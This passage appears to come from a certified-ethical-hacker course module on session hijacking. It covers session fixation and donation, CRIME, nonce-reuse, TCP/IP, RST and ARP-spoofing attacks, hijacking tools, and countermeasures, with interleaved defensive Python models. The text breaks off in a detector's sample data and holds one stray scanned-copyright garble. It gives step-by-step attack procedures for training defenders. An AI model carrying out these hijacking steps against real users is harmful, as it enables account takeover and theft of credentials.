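The replay above works because the server accepts the captured token as many times as it is presented. A token that carries an issue time and a one-time nonce under an HMAC lets the server refuse copies: the signature stops the fields from being edited, the time window rejects old captures, and the nonce cache rejects a capture replayed inside the window. The following is an added example, not part of the course material; the key, the user name and the four-step exchange are constructed, and a real deployment would share the key across servers and expire the nonce cache together with the window.

```python
"""Replay-resistant authentication tokens (added example; key and exchange constructed)."""
import hashlib
import hmac
import secrets


def make_auth_token(user, key, now):
    """user|issued_at|nonce|hmac, all ASCII; `now` is integer epoch seconds."""
    body = f"{user}|{int(now)}|{secrets.token_hex(8)}"
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{tag}"


class ReplayGuard:
    def __init__(self, key, window_seconds=30):
        self.key = key
        self.window = window_seconds
        self.seen_nonces = set()

    def verify(self, token, now):
        """Returns (accepted, reason); checks run signature, window, nonce, in that order."""
        try:
            user, issued_at, nonce, tag = token.split("|")
            issued_at = int(issued_at)
        except ValueError:
            return False, "malformed"
        body = f"{user}|{issued_at}|{nonce}"
        expected = hmac.new(self.key, body.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(tag, expected):
            return False, "bad signature"
        if abs(now - issued_at) > self.window:
            return False, "outside time window"
        if nonce in self.seen_nonces:
            return False, "replayed"          # the same capture presented a second time
        self.seen_nonces.add(nonce)
        return True, "ok"


def replay_scenario(now=1_700_000_000):
    """The four steps of the text with the guard in place; returns the server's verdicts."""
    key = secrets.token_bytes(32)                          # constructed server secret
    guard = ReplayGuard(key)
    token = make_auth_token("james", key, now)             # step 3: the user sends the token
    first = guard.verify(token, now + 1)                   # server accepts the genuine request
    replayed = guard.verify(token, now + 2)                # step 4: the capture is replayed
    late = guard.verify(make_auth_token("james", key, now), now + 120)  # replayed much later
    tampered = guard.verify(token.replace("james", "john", 1), now + 1)
    return {"first": first, "replayed": replayed, "late": late, "tampered": tampered}


if __name__ == "__main__":
    for step, verdict in replay_scenario().items():
        print(f"{step:9s} -> {verdict}")
```

Order matters in verify: the signature is checked before the nonce is recorded, so an attacker cannot fill the cache with forged nonces, and the window bounds how long the cache must remember anything.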
Compromising Session IDs Using Session Fixation

The attacker exploits the vulnerability of a server that allows a user to use a fixed SID.
Compromising Session IDs Using Session Fixation
Web session security prevents an attacker from intercepting, brute forcing, or predicting the session ID issued by a web server to a user's browser as proof of an authenticated session. However, this approach ignores the possibility of the attacker issuing a session ID to the user's browser, forcing it to use the chosen session ID. This type of attack is called a session fixation attack because an attacker fixes the user's session ID in advance, instead of generating it randomly at the time of login.

The attacker performs a session fixation attack to hijack a valid user session. The attacker takes advantage of limitations in web-application session ID management. Web applications allow the user to authenticate themselves using an existing session ID, instead of generating a new session ID. In this type of attack, the attacker provides a legitimate web-application session ID and lures the victim to use it. If the victim's browser uses that session ID, then the attacker can hijack the user-validated session because the attacker is already aware of the session ID used by the victim.

A session fixation attack is a kind of session hijack. However, instead of stealing the session established between a user and web server after the user logs in, a session fixation attack fixes an established session on the user's browser; thus, the attack is initiated before the user logs in.

An attacker uses various techniques to perform a session fixation attack:
Session token in the URL argument
Session token in a hidden form field
Session ID in a cookie

The attacker must choose a technique based on how the target web application uses session tokens. The attacker exploits the vulnerability of a server that allows a user to use a fixed session ID. Then, the attacker provides a valid session ID to a victim and lures them to authenticate themselves using that session ID. A session fixation attack has the following three phases.
Session set-up phase: In this phase, the attacker first obtains a legitimate session ID by establishing a connection with the target web server. Few web servers support the idle session time-out feature. If the target web server supports this feature, the attacker needs to send requests repeatedly to keep the established trap session ID alive.
Fixation phase: In this phase, the attacker introduces the session ID to the victim's browser, thereby fixing the session.
Entrance phase: In this phase, the attacker waits for the victim to log in to the target web server using the trap session ID and then enters the victim's session.

A session fixation attack is performed through the following steps.
First, the attacker establishes a legitimate connection with the target web server.
The target web server (e.g., http://citibank.com/) issues a session ID, say 0D6441FEA4496C2, to the attacker.
The attacker sends a link with the established session ID, say http://citibank.com/?SID=0D6441FEA4496C2, to the victim and lures the victim to click on it to access the website.
The victim clicks on the link, believing it to be a legitimate link sent by the bank. This opens the server's login page in the victim's browser for SID=0D6441FEA4496C2.
The web server checks that the session ID 0D6441FEA4496C2 is already established and is in an active state; hence, it does not create a new session.
Finally, the victim enters their login credentials in the login script, and the server grants them access to the bank account.
At this point, knowing the session ID, the attacker can also access the victim's bank account via http://citibank.com/?SID=0D6441FEA4496C2.
Because the session ID is set by the attacker before the user logged in, the user can be said to have logged into the attacker's session.
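The three phases above can be replayed against an in-memory session table to show exactly which server behaviour makes fixation work and which two changes stop it. The following is an added example, not part of the course material: the vulnerable configuration adopts a SID supplied by the client (the ?SID=0D6441FEA4496C2 link of the steps above) and keeps it across login; the hardened one ignores client-supplied SIDs and, as a second line of defence, issues a fresh SID at login so a SID known before authentication never names an authenticated session. The class, its flags and the user names are constructed for the example.

```python
"""Session fixation, vulnerable and hardened handling (added example; names constructed)."""
import secrets


class SessionManager:
    def __init__(self, accept_client_sid, regenerate_on_login):
        self.accept_client_sid = accept_client_sid
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}          # sid -> {"user": name or None}

    def start(self, requested_sid=None):
        """Set-up / fixation phase: the browser arrives with or without a SID."""
        if requested_sid is not None and self.accept_client_sid:
            # vulnerable: adopt whatever SID the request carried, creating it if unknown
            self.sessions.setdefault(requested_sid, {"user": None})
            return requested_sid
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid, user, credentials_ok=True):
        """Entrance phase: returns the SID that names the authenticated session."""
        if sid not in self.sessions or not credentials_ok:
            raise PermissionError("unknown session or bad credentials")
        if self.regenerate_on_login:
            del self.sessions[sid]                   # the pre-login SID stops working
            sid = secrets.token_urlsafe(32)
            self.sessions[sid] = {"user": user}
            return sid
        self.sessions[sid]["user"] = user           # vulnerable: SID survives authentication
        return sid

    def whoami(self, sid):
        entry = self.sessions.get(sid)
        return entry["user"] if entry else None


def fixation_succeeds(manager, trap_sid="0D6441FEA4496C2"):
    """Does a party who knew `trap_sid` before the victim logged in own the session after?"""
    sid_in_victim_browser = manager.start(requested_sid=trap_sid)   # victim follows the link
    manager.login(sid_in_victim_browser, "victim")                   # victim authenticates
    return manager.whoami(trap_sid) == "victim"                      # trap SID tried afterwards


if __name__ == "__main__":
    print("accepts client SID, keeps it  :",
          fixation_succeeds(SessionManager(accept_client_sid=True, regenerate_on_login=False)))
    print("accepts client SID, regenerates:",
          fixation_succeeds(SessionManager(accept_client_sid=True, regenerate_on_login=True)))
    print("ignores client SID, regenerates:",
          fixation_succeeds(SessionManager(accept_client_sid=False, regenerate_on_login=True)))
```

Regenerating the SID at login is the control that closes the attack on its own; refusing client-supplied SIDs additionally removes the URL and hidden-field delivery techniques listed above, which is why frameworks do both.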

Session Hijacking Using Proxy Servers

An attacker lures the victim to click on a bogus link, which looks legitimate but redirects the user to the attacker's server.
The attacker forwards the request to the legitimate server on behalf of the victim and serves as a proxy for the entire transaction.
The attacker then captures the session information during the interaction of the legitimate server and user.
Session Hijacking Using Proxy Servers
An attacker lures the victim to click on a fake link, which appears legitimate but redirects the user to the attacker's server. The attacker then forwards the request to the legitimate server on behalf of the victim and serves as a proxy for the entire transaction. Acting as a proxy, the attacker captures the session information during the interaction between the legitimate server and user.

Figure 11.17: Session hijacking using proxy servers (Victim; Attacker Server (reallybadguys.com); Legitimate Server (amazon.com); the bogus link is <a href="http://reallybadguys.com/gotcha.php">)

Session Hijacking Using CRIME Attack

The Compression Ratio Info-Leak Made Easy (CRIME) attack is a client-side attack that exploits the vulnerabilities present in the data compression feature of protocols such as SSL/TLS, SPDY, and HTTPS.
The information obtained from the cookie is used to establish a new authenticated session with the web application.
Session Hijacking Using CRIME Attack
Compression Ratio Info-Leak Made Easy (CRIME) is a client-side attack that exploits vulnerabilities in the data-compression feature of protocols such as SSL/Transport Layer Security (TLS), SPDY, and HTTP Secure (HTTPS). The possibility of mitigation against HTTPS compression is low, which makes this vulnerability even more dangerous than other compression vulnerabilities.

When two hosts on the Internet establish a connection using HTTPS, a TLS session is established, and the data are transmitted in an encrypted form. Hence, it is difficult for an attacker to read or modify the messages between the two hosts. When a user logs into a web application, authentication data are stored in a cookie. Whenever the browser sends an HTTPS request to the web application, the stored cookie is used for authentication. In this attack, the attacker attempts to access the authentication cookie to hijack the victim's session.

In HTTPS, cookies are compressed using a lossless data compression algorithm (DEFLATE) and then encrypted. Hence, it is difficult for an attacker to obtain the value of the cookie with simple sniffing.

To perform a CRIME attack, an attacker must use social engineering techniques to trick the victim into clicking on a malicious link. When the victim clicks on the malicious link, it either injects malicious code into the victim's system or redirects the victim to a malicious website. If the victim has already established an HTTPS connection with a secured web application, the attacker sniffs the victim's HTTPS traffic using techniques such as ARP spoofing. Through sniffing, the attacker captures the cookie value from the HTTPS messages and sends multiple HTTPS requests to the web application with that cookie prepended with a few random characters. Subsequently, the attacker monitors the traffic between the victim and web application to obtain the compressed and encrypted value of the cookie. After capturing the cookie, the attacker analyzes the cookie length and predicts the actual value of the authentication cookie.

After obtaining the authentication cookie, the attacker impersonates the victim and hijacks the victim's session with the secure web application to steal confidential information such as passwords, social security numbers, and credit card numbers. Attackers use tools such as CrimeCheck to detect whether a web server has TLS or HTTP compression enabled and are thus vulnerable to CRIME attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
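The length side channel that the CRIME description above relies on, and the random-padding countermeasure listed later in this module, modelled in Python. This is an added example, not EC-Council's text or any tool's code: DEFLATE is replaced by a minimal greedy LZ77 token counter (a stand-in for the matching stage of DEFLATE, enough to show the effect), the request layout, host name and cookie value are constructed, and the function names are this example's own. It shows only the single comparison the text describes (a right versus a wrong leading byte) and then that random padding of up to 255 bytes drowns that one-token signal in noise.

```python
import random


def lz77_tokens(data: bytes, min_match: int = 3) -> int:
    """Count the tokens a greedy LZ77 pass (the matching stage of DEFLATE) emits:
    one per literal byte, one per back-reference. Fewer tokens means a shorter
    compressed output, which is all the side channel needs to observe."""
    positions = {}  # byte value -> offsets already consumed
    i = tokens = 0
    n = len(data)
    while i < n:
        best = 0
        for j in positions.get(data[i], ()):
            k = 0
            while i + k < n and k < 258 and data[j + k] == data[i + k]:
                k += 1
            best = max(best, k)
        step = best if best >= min_match else 1
        for p in range(i, i + step):
            positions.setdefault(data[p], []).append(p)
        i += step
        tokens += 1
    return tokens


def request(attacker_guess: bytes, session_cookie: bytes) -> bytes:
    """Constructed request as it looks before compression and encryption: the
    attacker controls the URL, the browser appends the secret cookie."""
    return (b"GET /search?q=session=" + attacker_guess + b" HTTP/1.1\r\n"
            b"Host: bank.example\r\n"
            b"Cookie: session=" + session_cookie + b"\r\n\r\n")


def pad(plain: bytes, rng: random.Random, max_pad: int = 255) -> bytes:
    """Append a random-length run of random bytes (the padding countermeasure);
    random bytes do not compress, so they add length noise."""
    return plain + bytes(rng.randrange(256) for _ in range(rng.randrange(max_pad + 1)))


def right_guess_is_smaller(secret: bytes, right: bytes, wrong: bytes, rng=None) -> bool:
    """True when the request carrying the right leading byte of the cookie
    compresses to fewer tokens than the one carrying a wrong byte. With rng
    set, random padding is applied to both requests first."""
    a, b = request(right, secret), request(wrong, secret)
    if rng is not None:
        a, b = pad(a, rng), pad(b, rng)
    return lz77_tokens(a) < lz77_tokens(b)


def leak_rate(secret: bytes, right: bytes, wrong: bytes, trials: int = 60, seed: int = 7) -> float:
    """Fraction of padded trials in which the right guess is still distinguishable;
    close to 0.5 means the comparison is no better than a coin flip."""
    rng = random.Random(seed)
    hits = sum(right_guess_is_smaller(secret, right, wrong, rng) for _ in range(trials))
    return hits / trials
```

Without compression the two requests have identical length, so there is nothing to observe; with compression the correct byte extends an existing match and saves a token, which is the signal CRIME amplifies; with random padding the saved token is lost in the padding variance, which is why the countermeasure list recommends disabling compression or adding random padding.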
Session Hijacking Using Forbidden Attack

A forbidden attack is a type of MITM attack that can be executed when a cryptographic nonce is reused while establishing an HTTPS session with a server. According to the TLS specification, these arbitrary pieces of data must be used once. This attack exploits the vulnerability that the TLS implementation incorrectly reuses the same nonce when data are encrypted using the Advanced Encryption Standard-Galois/Counter Mode (AES-GCM) during the TLS handshake. Attackers exploit this vulnerability to perform an MITM attack by generating cryptographic keys used for authentication. Repeating the same nonce during the TLS handshake allows an attacker to monitor and hijack the connection. After hijacking the HTTPS session and bypassing the protection, attackers inject malicious code and forged content into the transmission, such as JavaScript code or web fields that prompt the user to disclose passwords, social security numbers, or other confidential information. A forbidden attack involves the following steps.

• The attacker monitors the connection between the victim and web server and sniffs the nonce from the TLS handshake messages.
• The attacker generates authentication keys using the nonce and hijacks the connection.
• All the traffic between the victim and web server flows through the attacker's machine.
• The attacker injects JavaScript code or web fields into the transmission towards the victim.
• The victim reveals sensitive information such as bank account numbers, passwords, and social security numbers to the attacker.
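Why reusing a nonce under one key is fatal for a counter-mode cipher such as the AES-GCM the forbidden attack targets, as an added illustration that is not part of the EC-Council text. HMAC-SHA256 in counter mode stands in for the AES counter-mode keystream of GCM (only the structure matters: the keystream depends on key, nonce and counter alone), the key, nonces and messages are constructed, and NonceGuard is this example's own name for the check a correct implementation performs before encrypting.

```python
import hashlib
import hmac


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: PRF(key, nonce || counter) blocks, concatenated.
    Two encryptions with the same key and nonce produce the same stream."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    return xor(plaintext, keystream(key, nonce, len(plaintext)))


def plaintext_xor_leaks(key: bytes, nonce1: bytes, nonce2: bytes, p1: bytes, p2: bytes) -> bool:
    """True when an observer holding only the two ciphertexts obtains p1 XOR p2,
    which happens exactly when the keystream was reused (same key, same nonce)."""
    c1 = encrypt(key, nonce1, p1)
    c2 = encrypt(key, nonce2, p2)
    return xor(c1, c2) == xor(p1, p2)


class NonceGuard:
    """Refuses to encrypt twice under the same (key, nonce) pair: the check the
    vulnerable TLS implementation described above lacked."""

    def __init__(self) -> None:
        self._seen = set()

    def encrypt(self, key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
        if (key, nonce) in self._seen:
            raise ValueError("nonce reuse under this key refused")
        self._seen.add((key, nonce))
        return encrypt(key, nonce, plaintext)
```

With the nonce repeated, XOR-ing the two ciphertexts cancels the keystream and exposes the XOR of the two plaintexts; with a fresh nonce per message the same operation yields nothing usable. In real AES-GCM the repeat additionally exposes the authentication subkey, which is what lets the forbidden attack forge content, so the guard has to be enforced on every encryption, not just on the record layer.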

Figure 11.19: Session hijacking using a forbidden attack
Session Hijacking Using Session Donation Attack

In a session donation attack, the attacker donates their own session ID to the target user. In this attack, the attacker first obtains a valid session ID by logging into a service and later feeds the same session ID to the target user. This session ID links a target user to the attacker's account page without disclosing any information to the victim. When the target user clicks on the link and enters the details (username, password, payment details, etc.) in a form, the entered details are linked to the attacker's account. To initiate this attack, the attacker can send their session ID using techniques such as cross-site cooking, an MITM attack, and session fixation. A session donation attack involves the following steps.

• First, the attacker logs into a service, establishes a legitimate connection with the target web server, and deletes the stored information.
• The target web server (e.g., http://citibank.com/) issues a session ID, say 0D6441FEA4496C2, to the attacker.
• The attacker then donates their session ID, say http://citibank.com/?SID=0D6441FEA4496C2, to the victim and lures the victim to click on it to access the website.
• The victim clicks on the link, believing it to be a legitimate link sent by the bank. This opens the server's page in the victim's browser with SID=0D6441FEA4496C2.
• Finally, the victim enters their information in the page and saves it.
• The attacker can now log in as themselves and acquire the victim's information.

Figure 11.20: Session hijacking using session donation attack
Module Flow

01 Session Hijacking Concepts
02 Application Level Session Hijacking
03 Network Level Session Hijacking
04 Session Hijacking Tools
05 Countermeasures
Network Level Session Hijacking

Attackers especially focus on network level session hijacking because it does not require host access, in contrast to host-level session hijacking, or a need to tailor their attacks on a per-application basis, in contrast to application level hijacking. This section discusses network level session hijacking, concepts related to network communications, and various techniques used to perform network level session hijacking.

Network level hijacking relies on hijacking transport and Internet protocols used by web applications in the application layer. By attacking network level sessions, the attacker gathers some critical information that is used to attack application level sessions. The following are different types of network level hijacking:

• Blind hijacking
• UDP hijacking
• TCP/IP hijacking
• RST hijacking
• Man-in-the-middle: packet sniffer
• IP spoofing: source routed packets

Three-way Handshake
When two parties establish a connection using TCP, they perform a three-way handshake. A three-way handshake starts the connection and exchanges all the parameters needed for the two parties to communicate. TCP uses a three-way handshake to establish a new connection.

Initially, the client-side connection is in the closed state and the server-side in the listening state. The client initiates the connection by sending the initial sequence number (ISN) and setting the SYN flag. The client is now in the SYN-SENT state.

When the server receives this packet, it acknowledges the client sequence number and sends its own ISN with the SYN flag set. The server's state is now SYN-RECEIVED. On receipt of this packet, the client acknowledges the server sequence number by incrementing it and setting the ACK flag. The client is now in the established state. At this point, the two machines have established a session and can communicate.

On receiving the client's acknowledgement, the server enters the established state and sends an acknowledgment, incrementing the client's sequence number. The connection can be closed either by using the RST or FIN flag or through a time out. If the RST flag of a packet is set, the receiving host enters the CLOSED state and frees all resources associated with this connection. This leads to the connection drop of any additional incoming packets. If the packet is sent with the FIN flag turned on, the receiving host closes the connection because it enters the CLOSE-WAIT state. The packets sent by the client are accepted in an established connection if the sequence number is within the range and follows its predecessor. If the sequence number is beyond the acceptable range, it drops the packet and sends an ACK packet using the expected sequence number.

For the three parties to communicate, the following information is required:
• IP address
• Port numbers
• Sequence numbers

It is easy for an attacker to determine the IP address and port number; these are available in the IP packets, which do not change throughout the session. However, the sequence numbers change. Therefore, the attacker must successfully guess the sequence numbers for a blind hijack. If the attacker can fool the server into receiving their spoofed packets and executing them, the attacker is successful in hijacking the session.

Figure 11.21: Three-way handshake (Bob sends SYN; the server replies SYN/ACK with ACK 4001, SEQ 7000; Bob replies ACK with ACK 7001)

The three-way handshake shown in the above figure involves the following steps.
1. Bob initiates a connection with the server and sends a packet to the server with the SYN flag set.
2. The server receives this packet and sends a packet with the SYN + ACK flag and an initial sequence number (ISN) for the server.
3. Bob sets the ACK flag acknowledging the receipt of the packet and increments the sequence number by 1.
4. The two machines have successfully established a session.

If the attacker can anticipate the next sequence number and ACK number that Bob will send, they can spoof Bob's address and start communication with the server.
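The handshake and the acceptance rule described above, as an added Python model that is not part of the EC-Council text. Endpoint and Segment are this example's own names; the ISNs 4000 and 7000 follow the figure's numbers, the addresses are constructed, and a real stack chooses its ISN unpredictably (here `secrets.randbelow`, the default when no ISN is given), which is the countermeasure for the sequence-number guessing the text describes. The model shows what a receiver checks on each segment: the peer's address first, then whether the sequence number is exactly the expected one (accepted) or outside the window (dropped and answered with an ACK carrying the expected number).

```python
import secrets
from dataclasses import dataclass

MOD = 2 ** 32  # sequence numbers wrap at 32 bits


@dataclass
class Segment:
    src: str
    dst: str
    seq: int
    ack: int
    flags: frozenset
    payload: bytes = b""


class Endpoint:
    """Minimal TCP state machine: LISTEN/CLOSED -> SYN-SENT/SYN-RECEIVED ->
    ESTABLISHED, with the in-window check on incoming segments."""

    def __init__(self, addr, isn=None, window=65535, listen=False):
        self.addr = addr
        self.state = "LISTEN" if listen else "CLOSED"
        self.snd_nxt = secrets.randbelow(MOD) if isn is None else isn  # unpredictable ISN by default
        self.rcv_nxt = None
        self.window = window
        self.received = []
        self.peer = None

    def connect(self, peer):
        """Client side: send SYN with our ISN."""
        self.peer, self.state = peer, "SYN-SENT"
        return Segment(self.addr, peer, self.snd_nxt, 0, frozenset({"SYN"}))

    def in_window(self, seq):
        return (seq - self.rcv_nxt) % MOD < self.window

    def handle(self, seg):
        """Process one incoming segment; return the segment to send back, if any."""
        if seg.dst != self.addr:
            return None
        if self.state == "LISTEN" and "SYN" in seg.flags:
            self.peer, self.rcv_nxt, self.state = seg.src, (seg.seq + 1) % MOD, "SYN-RECEIVED"
            return Segment(self.addr, seg.src, self.snd_nxt, self.rcv_nxt, frozenset({"SYN", "ACK"}))
        if self.state == "SYN-SENT" and seg.flags >= {"SYN", "ACK"}:
            if seg.ack != (self.snd_nxt + 1) % MOD:
                return None  # does not acknowledge our SYN
            self.snd_nxt, self.rcv_nxt, self.state = seg.ack, (seg.seq + 1) % MOD, "ESTABLISHED"
            return Segment(self.addr, seg.src, self.snd_nxt, self.rcv_nxt, frozenset({"ACK"}))
        if self.state == "SYN-RECEIVED" and "ACK" in seg.flags:
            if seg.ack != (self.snd_nxt + 1) % MOD:
                return None
            self.snd_nxt, self.state = seg.ack, "ESTABLISHED"
            return None
        if self.state == "ESTABLISHED":
            if seg.src != self.peer:
                return None  # address/port mismatch: the cheap part of the check
            if "RST" in seg.flags and self.in_window(seg.seq):
                self.state = "CLOSED"  # reset accepted: resources freed
                return None
            if seg.payload and seg.seq == self.rcv_nxt:
                self.received.append(seg.payload)
                self.rcv_nxt = (self.rcv_nxt + len(seg.payload)) % MOD
                return Segment(self.addr, seg.src, self.snd_nxt, self.rcv_nxt, frozenset({"ACK"}))
            if not self.in_window(seg.seq):
                # out of range: drop, and tell the peer which number we expect
                return Segment(self.addr, seg.src, self.snd_nxt, self.rcv_nxt, frozenset({"ACK"}))
        return None


def handshake(client, server):
    """Run SYN, SYN/ACK, ACK between the two endpoints and return their states."""
    syn = client.connect(server.addr)
    syn_ack = server.handle(syn)
    ack = client.handle(syn_ack)
    server.handle(ack)
    return client.state, server.state
```

The only thing a third party cannot read off the wire in this model is the expected sequence number; that is why the ACK the receiver sends back for an out-of-range segment is also what an ACK storm is made of, and why an unpredictable ISN matters.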

TCP/IP Hijacking

In TCP/IP hijacking, an attacker intercepts an established connection between two communicating parties by using spoofed packets and then pretends to be one of those parties. In this approach, the attacker uses spoofed packets to redirect the TCP traffic to their own machine. Once this is successful, the victim's connection hangs, and the attacker is able to communicate with the host's machine on behalf of the victim. To launch a TCP/IP hijacking attack, both the victim and attacker must be on the same network. The target server and the victim machines can be located anywhere. By using this technique, an attacker can easily attack systems that use one-time passwords. As illustrated in the below figure, TCP/IP hijacking involves the following processes.

• The hacker sniffs the communication between the victim and host to obtain the victim's ISN.
• By using this ISN, the attacker sends a spoofed packet from the victim's IP address to the host system.
• The host machine responds to the victim, assuming that the packet arrived from it. This increments the sequence number.
Figure 11.22: TCP/IP hijacking process

TCP/IP hijacking is performed through the following steps.
• The attacker sniffs the victim's connection and uses the victim's IP address to send a spoofed packet with the predicted sequence number.
• The receiver processes the spoofed packet, increments the sequence number, and sends an acknowledgement to the victim's IP address.
• The victim machine is unaware of the spoofed packet. Therefore, it ignores the receiver machine's ACK packet and turns off sequence number count. Consequently, the receiver receives packets with the incorrect sequence number.
• The attacker forces the victim's connection with the receiver machine into a desynchronized state.
• The attacker tracks sequence numbers and continuously spoofs packets that originate from the victim's IP address.
• The attacker continues to communicate with the receiver machine, while the victim's connection hangs.
IP Spoofing: Source Routed Packets

Source routed packets are useful in gaining unauthorized access to a computer with the help of a trusted host's IP address. This type of hijack allows attackers to create their own acceptable packets to insert into a TCP session. First, an attacker spoofs a trusted host's IP address so that the server managing a session with the host accepts the packets from the attacker. The packets are source routed; therefore, the sender specifies the path for packets from the source to the destination IP. By using this source-routing technique, attackers fool the server into believing that it is communicating with the user.

After spoofing the IP address successfully, the hijacker alters the sequence and acknowledgment numbers. Once these numbers are changed, the attacker injects forged packets into the TCP session before the client can respond. This leads to a desynchronized state because the sequence and ACK numbers are not synchronized. The original packets are lost, and the server receives a packet with the new ISN. These packets are source routed to a destination IP address specified by the attacker.
RST Hijacking

RST hijacking involves injecting an authentic-looking reset (RST) packet by using a spoofed source IP address and predicting the acknowledgment number. The hacker can reset the victim's connection if it uses an accurate acknowledgment number. The victim believes that the source has sent the reset packet and resets the connection. RST hijacking can be performed using packet-crafting tools such as Colasoft Packet Builder and TCP/IP analysis tools such as tcpdump.
Blind Hijacking

In blind hijacking, an attacker can inject malicious data or commands into intercepted communications in a TCP session, even if the victim disables source routing. For this purpose, the attacker must correctly guess the next ISN of a computer attempting to establish a connection. Although the attacker can send malicious data or a command, such as a password setting to allow access from another location on the network, the attacker cannot view the response. To be able to view the response, an MITM attack is a much better option.

Figure: Blind hijacking process

UDP Hijacking
The User Datagram Protocol (UDP) does not use packet sequencing or synchronizing. Therefore, it is easy to modify data without the victim noticing, and a UDP session can be attacked more easily than a TCP session. Because UDP is connectionless, the attacker forges a server reply to a client UDP request before the server can respond. Thus, in network level session hijack, the hijacker takes control of the session. No packets are exchanged between the server and client, because the server's acknowledgement sequence number fails to match the client's number. The server's reply can be easily restricted if sniffing is used. An MITM attack in UDP hijacking can minimize the task of the attacker because it can stop the server's reply from reaching the client in the first place.

Figure 11.25: Hijacking a UDP session
MITM Attack Using Forged ICMP and ARP Spoofing

An MITM attack uses a packet sniffer to intercept communication between a client and server. The attacker changes the default gateway of the client's machine and attempts to reroute packets. The packets between the client and server are routed through the hijacker's host by using the following two techniques.

• Forged Internet Control Message Protocol (ICMP)
The Internet Control Message Protocol (ICMP) is an extension of IP used to send error messages. An attacker can use ICMP to send messages to fool the client and server. In this technique, ICMP packets are forged to redirect traffic between the client and host through the hijacker's host. The hacker's packets send error messages indicating problems in processing packets through the original connection. This fools the server and client into routing through the hijacker's path instead.

• Address Resolution Protocol (ARP) Spoofing
Hosts use Address Resolution Protocol (ARP) tables to map local network layer addresses (IP addresses) to hardware addresses or MAC addresses. This technique involves fooling the host by broadcasting ARP requests and changing its ARP tables by sending forged ARP replies. The attacker sends forged ARP replies that update the ARP tables of the host that is broadcasting ARP requests. This routes the traffic to the attacker's host instead of the legitimate IP address.

In both techniques, an attacker routes the packets in transit between the client and server through their machine.
Session Hijacking Tools

Attackers can use tools such as Burp Suite, OWASP ZAP, and bettercap to hijack a session between a client and server. This section discusses various tools that help perform session hijacking.

• Burp Suite
Source: https://portswigger.net
Burp Suite is an integrated platform for the security testing of web applications. It allows attackers to inspect and modify traffic between a browser and target application. Burp Suite contains the following key components.
o An intercepting proxy, which allows the user to inspect and modify traffic between their browser and the target application
o An application-aware spider that crawls content and functionality
o An advanced web application scanner that automates the detection of numerous types of vulnerability
o An intruder tool for performing powerful customized attacks to find and exploit unusual vulnerabilities
o A repeater tool for manipulating and resending individual requests
o A sequencer tool for testing the randomness of session tokens
o The CSRF PoC Generator function, which generates proof-of-concept cross-site request forgery (CSRF) attacks for a given request

As shown in the figure, attackers can use this tool to capture the session cookie of a victim and later use that cookie to reopen a closed session of the victim.

Figure 11.26: Screenshot of Burp Suite

The following are some additional session hijacking tools:
• OWASP ZAP (https://www.owasp.org)
• bettercap (https://www.bettercap.org)
• netool toolkit (https://sourceforge.net)
• WebSploit Framework (https://sourceforge.net)
• sslstrip (https://pypi.python.org)
Session Hijacking Tools for Mobile Phones

• DroidSheep
Source: https://droidsheep.info
The DroidSheep tool is used for session hijacking on Android devices connected to a common wireless network. It obtains the session ID of active users on the Wi-Fi network and uses it to access a website as an authorized user. A DroidSheep user can easily observe the activities of authorized users on websites. It can also hijack social accounts by obtaining the session ID.

Figure 11.27: Screenshot of DroidSheep
• DroidSniff
Source: https://github.com
DroidSniff is an Android app for security analysis in wireless networks that can capture Facebook, Twitter, LinkedIn, and other accounts. This tool is used for testing the security of user accounts. It identifies the poor security properties of network connections without encryption.

Figure 11.28: Screenshot of DroidSniff

• FaceNiff
Source: http://faceniff.ponury.net
FaceNiff is an Android app that allows a user to sniff and intercept web-session profiles over the WiFi network that the user's mobile device is connected to. Although FaceNiff can hijack sessions only when the WiFi network does not use the Extensible Authentication Protocol (EAP), it works on any private network, including open, Wired Equivalent Privacy (WEP), Wi-Fi Protected Access-pre-shared key (WPA-PSK), and WPA2-PSK networks.
Countermeasures

In general, session hijacking is a dangerous attack because the victim is at risk of identity theft, fraud, and loss of sensitive information. All networks using TCP/IP are vulnerable to the different types of session hijacking attacks discussed earlier. However, following best practices might protect against session hijacking attacks.

This section discusses session hijacking detection methods, session hijacking detection tools, various countermeasures to combat session hijacking attacks, and approaches causing vulnerability to session hijacking and their preventative solutions such as IP Security (IPsec).
Session Hijacking Detection Methods

Session hijacking attacks are exceptionally difficult to detect, and users often overlook them unless the attacker causes severe damage. The following are some symptoms of a session hijacking attack:
• A burst of network activity for some time, which decreases the system performance
• Busy servers resulting from requests sent by both the client and hijacker

Methods to detect session hijacking:
• Manual method: using packet sniffing software
• Automatic method: using intrusion detection systems (IDS) and intrusion prevention systems (IPS)

Figure 11.30: Session hijacking detection methods
• Manual Method
The manual method involves the use of packet sniffing software such as Wireshark and SteelCentral Packet Analyzer to monitor session hijacking attacks. The packet sniffer captures packets in transit across the network, which are then analyzed using various filtering tools.

Forced ARP Entry
A forced ARP entry involves replacing the MAC address of a compromised machine in the ARP cache of the server with a different one in order to restrict network traffic to the compromised machine. A forced ARP entry should be performed in the case of the following:
o Repeated ARP updates
o Frames sent between the client and server with different MAC addresses
o ACK storms

• Automatic Method
The automatic method involves the use of intrusion detection systems (IDS) and intrusion prevention systems (IPS) to monitor incoming network traffic. If the packet matches any of the attack signatures in the internal database, the IDS generates an alert, whereas the IPS blocks the traffic from entering the database.
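The two ARP conditions just listed (repeated ARP updates, and the same host answering with different MAC addresses), which are also the footprint left by the ARP spoofing technique described in the MITM section, as a small detector run over constructed ARP reply observations. This is an added example, not EC-Council's or ARPwatch's code; the addresses, timestamps and thresholds are constructed, and the event layout (time in seconds, sender IP, sender MAC) is this example's own.

```python
from collections import defaultdict, deque

# Constructed ARP reply observations: (seconds, sender IP, sender MAC).
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.0.1", "aa:bb:cc:00:00:01"),    # gateway answers a normal request
    (5.0, "192.168.0.20", "aa:bb:cc:00:00:20"),
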